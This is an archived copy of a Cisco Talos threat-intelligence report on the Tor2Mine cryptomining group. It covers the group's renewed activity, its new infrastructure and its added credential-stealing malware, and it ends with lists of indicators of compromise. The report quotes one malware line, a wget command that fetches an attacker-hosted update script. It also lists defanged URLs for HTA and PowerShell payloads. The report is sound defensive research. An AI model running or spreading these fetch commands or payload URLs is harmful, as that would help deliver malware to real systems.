{
	"id": "a319dbcc-da0c-439b-b8e0-7de910eafcfb",
	"created_at": "2026-04-06T00:12:46.552628Z",
	"updated_at": "2026-04-10T03:22:08.510779Z",
	"deleted_at": null,
	"sha1_hash": "899c41007672343b209d952fe15ec2f3e77f4aa2",
	"title": "Tor2Mine is up to their old tricks — and adds a few new ones",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 690147,
	"plain_text": "Tor2Mine is up to their old tricks — and adds a few new ones\r\nBy Joe Marshall\r\nPublished: 2020-06-11 · Archived: 2026-04-05 19:23:35 UTC\r\nThursday, June 11, 2020 14:53\r\nBy Kendall McKay and Joe Marshall.\r\nThreat summary\r\nCisco Talos has identified a resurgence of activity by Tor2Mine, a cryptocurrency mining group that was\r\nlikely last active in 2018. Tor2Mine is deploying additional malware to harvest credentials and steal more\r\nmoney, including AZORult, an information-stealing malware; the remote access tool Remcos; the\r\nDarkVNC backdoor trojan; and a clipboard cryptocurrency stealer.\r\nThe actors are also using a new IP address and two new domains to carry out their operations.\r\nThe addition of new tactics, techniques, and procedures (TTPs) suggest Tor2Mine is seeking ways to\r\ndiversify their revenue in a volatile cryptocurrency market.\r\nWhat’s new?\r\nTor2Mine has traditionally been a cryptocurrency mining malware actor notorious for infecting victims with\r\ncryptominers that steal system resources to mine currency. In a new development, the Tor2Mine actors have\r\nincorporated additional malware into their operations, likely as a way to diversify revenue streams and stay\r\nrelevant in a COVID-19 world where cryptocurrencies are fluctuating wildly.\r\nSo what?\r\nBetween January and June 2020, Cisco Talos observed resurgent activity from Tor2Mine, a profit-driven actor that\r\nremains active despite a global economic recession and volatile cryptocurrency market. To address these\r\nchallenges, Tor2Mine, a group traditionally known to deliver cryptocurrency mining malware, has begun using\r\nadditional malware to harvest victims’ credentials and steal more money. The addition of new TTPs, as well as the\r\nuse of new infrastructure, highlights Tor2Mine’s resilience in a challenging threat environment. These\r\ndevelopments also underscore threat actors’ persistence more broadly and should serve as a reminder that\r\norganizations must maintain heightened security at all times.\r\nWhat makes the Tor2Mine group notable is their use of Tor2web for command and control (C2) for their malware\r\ninfections. The Tor2web services act as a bridge between the internet and the Tor network, a system that allows\r\nusers to enable anonymous communication. These services are useful for malware authors because they eliminate\r\nthe need for malware to communicate with the Tor network directly, which is suspicious and may be blocked, and\r\nallow the C2 server's IP address to be hidden.\r\nhttps://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html\r\nPage 1 of 7\n\nAnalysis\r\nTalos recently identified activity in our endpoint telemetry associated with Tor2Mine affecting at least six different\r\ncompanies. The activity has been ongoing since January 2020, resurfacing after a likely year-long hiatus since we\r\nfirst identified the threat actor in December 2018. While much of the infrastructure remains the same, we\r\nidentified a new IP and two domains that we assess are currently being leveraged by Tor2Mine. During the course\r\nof our research, we also discovered evidence suggesting that the Tor2Mine actors are deploying additional\r\nmalware in tandem with XMRig during their operations to harvest credentials and steal more money. The new\r\nmalware includes AZORult, an information-stealing malware; the remote access tool Remcos; the DarkVNC\r\nbackdoor trojan; and a clipboard cryptocurrency stealer.\r\nTor2Mine resurfaces\r\nIn much of this recent activity, the actors use previously identified infrastructure to carry out their operations. In\r\none cluster of activity against a telecommunications company, we observed the attacker executing PowerShell\r\ncommands to download files from multiple Tor2Mine-related domains. The attacker attempts to run Microsoft\r\nHTML Applications (HTA) from multiple URLs (listed below) using Mshta, a utility for executing HTA files:\r\nhxxps[:]//qm7gmtaagejolddt[.]onion[.]to/check[.]hta\r\nhxxp[:]//res1[.]myrms[.]pw/upd[.]hta\r\nhxxp[:]//eu1[.]minerpool[.]pw/check[.]hta The qm7gmtaagejolddt[.]onion[.] domain is a known Tor2web\r\ngateway used by Tor2Mine actors to proxy communications. According to our previously mentioned blog,\r\nthe actors have been using this domain since at least 2018. The res1[.]myrms[.]pw domain also appears to\r\nhave connections to Tor2Mine, as it is hosted on an IP address (107[.]181[.]187[.]132) previously known to\r\nbe used by Tor2Mine actors. In the activity outlined in our 2018 blog, Tor2Mine actors used a PowerShell\r\nscript to install follow-on malware onto the compromised system from this same IP. The\r\neu1[.]minerpool[.]pw, also hosted on 107[.]181[.]187[.]132, is the same mining pool the actors used in the\r\n2018 activity.\r\nThe actor also used a PowerShell command to download a .ps1 file from\r\nhxxp[:]//v1[.]fym5gserobhh[.]pw/v1/check1[.]ps1. The v1[.]fym5gserobhh[.]pw domain is hosted on the same\r\naforementioned IP. According to Umbrella data, v1[.]fym5gserobhh[.]pw and eu1[.]minerpool[.]pw are registered\r\nunder two different reg[.]ru nameservers (ns2[.]reg[.]ru and ns1[.]reg[.]ru).\r\nNew infrastructure identified\r\nWhile we identified many of the same domains and IP addresses being used from 2018 in this more recent\r\nactivity, we also identified several new indicators of compromise (IOCs) that were not previously associated with\r\nTor2Mine. In similar activity related to another company in mid-May, we saw the actors using Mshta to execute\r\nHTA files from many of the same URLs mentioned above. However, we also observed a new domain,\r\neu1[.]ax33y1mph[.]pw, in activity affecting an environmental consulting company between April and May 2020.\r\nThe domain is hosted on the same 107[.]181[.]187[.]132 IP address and was first seen in March 2020, according\r\nto Umbrella, suggesting this is a relatively new component of the attacker’s infrastructure.\r\nhttps://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html\r\nPage 2 of 7\n\nUmbrella data showing the DNS resolution information for eu1[.]ax33y1mph[.]pw\r\nAs our research progressed, we continued to identify related threat activity against several more companies\r\ninvolving the use of new Tor2Mine infrastructure. We identified a new IP, 185[.]10[.]68[.]147, hosting at least two\r\ndomains, asq[.]r77vh0[.]pw and asq[.]d6shiiwz[.]pw, that we assess are part of Tor2Mine’s infrastructure. The\r\nasq[.]r77vh0[.]pw domain is registered under the same two previously mentioned reg[.]ru providers. It first\r\nappeared in our endpoint telemetry for two days in July 2019 but did not reappear until late February 2020. This\r\ndomain was previously hosted on 107[.]181[.]160[.]197, an IP used by Tor2Mine actors, according to our 2018\r\nblog.\r\nThe asq[.]r77vh0[.]pw domain also has at least one referring file\r\n(67f5f339c71c9c887dfece5cb6e2ab698b8c8a575d1ab9dd37ac32232be1aa04) that reaches out to both the older\r\n107[.]181[.]160[.]197 IP and the newly identified 185[.]10[.]68[.]147 IP, bolstering the notion that\r\n185[.]10[.]68[.]147 is an extension of Tor2Mine’s infrastructure.\r\nCisco Umbrella showing a spike in DNS requests for asq[.]r77vh0[.]pw.\r\nThe asq[.]d6shiiwz[.]pw domain is also registered under the same two reg[.]ru hosting providers. According to\r\nVirusTotal, this domain has hosted several URLs that are lexically similar to previously identified Tor2Mine\r\nURLs, such as those ending in “.hta” and “checking.ps1”. Two such examples are\r\nhxxp[:]//asq[.]d6shiiwz[.]pw/win/hssl/d6[.]hta and hxxps[:]//asq[.]d6shiiwz[.]pw/win/checking[.]ps1. Both\r\ndomains were also previously hosted on the same IP address, 195[.]123[.]234[.]33, which also hosts malicious\r\npayloads associated with XMRig.\r\nWe first observed these domains being hosted on 185[.]10[.]68[.]147 on March 15, 2020, according to Umbrella,\r\nand they remain associated as of this writing. This IP also hosts fh[.]fhcwk4q[.]xyz, a domain associated with\r\nXMRigCC, a variant of XMRig leveraged by many different threat actors. In addition to these domains, we also\r\nhttps://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html\r\nPage 3 of 7\n\nfound several URLs hosted on 185[.]10[.]68[.]147 in VirusTotal that are structurally similar to many of the\r\naforementioned Tor2Mine URLs, such as hxxp[:]//185[.]10[.]68[.]147/win/update[.]hta and\r\nhxxp[:]//185[.]10[.]68[.]147/win/del[.]ps1. As previously noted, Tor2Mine actors were observed using PowerShell\r\ncommands to download .ps1 files and Mshta to execute .hta files.\r\nThe IP also has a communicating Shell script file\r\n(4d21cab49f7d7dd7d39df72b244a249277c37b5561e74420dfc96fb22c8febac). The content of this file includes a\r\nstring with a wget request to hxxp[:]//asq[.]r77vh0[.]pw/lin/update[.]sh. From there, we identified a file\r\n(daa768e8d66aa224491000e891f1ef2cb7c674df2f3097fef7db90d692e2f539) in VirusTotal whose content shows\r\nan identical wget request (“wget --user-agent \"linux\" -q -O - hxxp://asq[.]r77vh0[.]pw/lin/update[.]sh”). This file\r\nreaches out to the aforementioned 195[.]123[.]234[.]33, an XMRigCC IP that previously hosted the newly\r\nidentified domains, according to VirusTotal and Umbrella, respectively.\r\nFile containing the Tor2Mine IP and domain.\r\nUsing the same approach, we identified several other files that also had this string in their contents. One such file,\r\n3c2d83b9e9b1b107c3db1185229865b658bbaebc8020c1b2a4f9155ca87858fc, has embedded URLs that are hosted\r\non 107[.]181[.]187[.]132 (e.g., hxxp[:]//107[.]181[.]160[.]197/lin/32/xmrig), which we previously mentioned is a\r\nknown Tor2Mine IP. These connections to the older Tor2Mine infrastructure further suggests that\r\n185[.]10[.]68[.]147 is a new IP used by the same actors.\r\nNew malware added to the mix\r\nDuring the course of our research, we discovered evidence suggesting that the Tor2Mine actors are deploying\r\nAZORult and other malware in tandem with XMRig during their operations to harvest credentials and steal more\r\nmoney. Our previous research from April 2020 outlined a complex campaign with several different executable\r\npayloads focused on obtaining money for the attackers. The campaign included the use of a variant of AZORult,\r\nan information-stealing malware; as well as the RAT Remcos; the DarkVNC backdoor trojan; and a clipboard\r\ncryptocurrency stealer. Much of the infrastructure mentioned in the April blog overlaps with many of the new\r\nTor2Mine IOCs we identified. According to the blog, there were several domains referenced in the configuration\r\nfor an XMRigCC payload during these campaigns, including eu[.]minerpool[.]pw and rs[.]fym5gserobhh[.]pw,\r\nboth lexically similar to the eu1[.]minerpool[.]pw and v1[.]fym5gserobhh[.]pw domains we discovered in our\r\nrecent research. The configuration also mentioned 185[.]10[.]68[.]220, our newly identified Tor2Mine IP.  In\r\naddition to these similarities, the April blog also mentions the AZORult actors downloading XMRig from\r\n195[.]123[.]234[.]33, which previously hosted the two newly identified Tor2Mine domains, asq[.]r77vh0[.]pw and\r\nasq[.]d6shiiwz[.]pw. Furthermore, these two domains were also used by the actors outlined in the April blog. The\r\nURLs associated with these domains are structurally similar to many of the URLs we observed during the course\r\nhttps://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html\r\nPage 4 of 7\n\nof our recent Tor2Mine discoveries, including hxxps://asq[.]r77vh0[.]pw/win/checking[.]ps1 and\r\nhxxps://asq[.]d6shiiwz[.]pw/win/hssl/d6[.]hta.\r\nThe likely addition of AZORult and additional malware to Tor2Mine’s tactics, techniques, and procedures (TTPs)\r\nshows that the actors remain active and continue to look for ways to update their capabilities to increase their\r\nmonetary gain. Notably, the Tor2Mine activity from this year is consistent with a general uptick in cryptocurrency\r\nminers observed by Talos over the last several months, including a resurgence in PowerGhost and MyKings.\r\nThe big picture\r\nMany bad actors, like Tor2Mine, who distribute malware for profit often have operational challenges that are\r\nsimilar to many legitimate global enterprises, such as product creation, distribution, overhead, infrastructure,\r\nsupply chain and resilient revenue streams. As we have seen in the Tor2Mine activity, financially motivated cyber\r\nthreat actors will continue to reinvent themselves and find new methods of generating revenue, as their survival\r\ndepends on it. If crytominers cease to be profitable enough for the operators, bad actors will probably diversify\r\ntheir attack portfolios to include even more dangerous threats like ransomware. Ultimately, just as organizations\r\nhave to adapt to a continually changing environment to stay in business, malware distribution groups must also\r\nremain agile and respond to new challenges.\r\nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these\r\nthreat actors. Exploit Prevention present within AMP is designed to protect customers from unknown attacks such\r\nas this automatically.\r\nCisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious\r\nwebsites and detects malware used in these attacks.\r\nEmail Security can block malicious emails sent by threat actors as part of their campaign.\r\nNetwork Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention\r\nSystem (NGIPS), Cisco ISR, and Meraki MX can detect malicious activity associated with this threat.\r\nhttps://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html\r\nPage 5 of 7\n\nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.\r\nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs,\r\nwhether users are on or off the corporate network.\r\nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.\r\nIOCs\r\nDomains\r\nv1[.]fym5gserobhh[.]pw\r\nres1[.]myrms[.]pw\r\neu1[.]minerpool[.]pw\r\neu1[.]ax33y1mph[.]pw\r\nasq[.]r77vh0[.]pw\r\nasq[.]d6shiiwz[.]pw\r\nIPs 107[.]181[.]187[.]132\r\n185[.]10[.]68[.]147\r\n195[.]123[.]234[.]33\r\nURLs\r\nhxxp[:]//v1.fym5gserobhh.pw/php/func.php\r\nhxxp[:]//v1.fym5gserobhh.pw/v1/check1.ps1\r\nhxxp[:]//eu1.minerpool.pw/check.hta\r\nhxxp[:]//eu1.minerpool.pw/upd.hta\r\nhxxp[:]//eu1.minerpool.pw/rckl/check.hta\r\nhxxp[:]//res1.myrms.pw/upd.hta\r\nhxxps[:]//eu1.ax33y1mph.pw/check.hta\r\nhxxps[:]//qm7gmtaagejolddt.onion.to/check.hta\r\nhxxps[:]//asq.r77vh0.pw/win/hssl/r7.hta\r\nhxxps[:]//asq.r77vh0.pw/win/php/func.php hxxp[:]//asq.r77vh0.pw/win/checking.hta\r\nhxxp[:]//asq.d6shiiwz.pw/win/hssl/d6.hta\r\nhxxps[:]//asq.d6shiiwz.pw/win/checking.ps1\r\nhxxp[:]//107.181.160.197/lin/32/xmrig\r\nhxxp[:]//185.10.68.147/win/update.hta\r\nhxxp[:]//185.10.68.147/win/del.ps1qm7gmtaagejolddt.onion.to\r\nFile hashes\r\nhttps://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html\r\nPage 6 of 7\n\n67f5f339c71c9c887dfece5cb6e2ab698b8c8a575d1ab9dd37ac32232be1aa04\r\n4d21cab49f7d7dd7d39df72b244a249277c37b5561e74420dfc96fb22c8febac\r\n3c2d83b9e9b1b107c3db1185229865b658bbaebc8020c1b2a4f9155ca87858fc\r\ndaa768e8d66aa224491000e891f1ef2cb7c674df2f3097fef7db90d692e2f539\r\nSource: https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html\r\nhttps://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html"
	],
	"report_names": [
		"tor2mine-is-up-to-their-old-tricks-and_11.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434366,
	"ts_updated_at": 1775791328,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/899c41007672343b209d952fe15ec2f3e77f4aa2.pdf",
		"text": "https://archive.orkl.eu/899c41007672343b209d952fe15ec2f3e77f4aa2.txt",
		"img": "https://archive.orkl.eu/899c41007672343b209d952fe15ec2f3e77f4aa2.jpg"
	}
}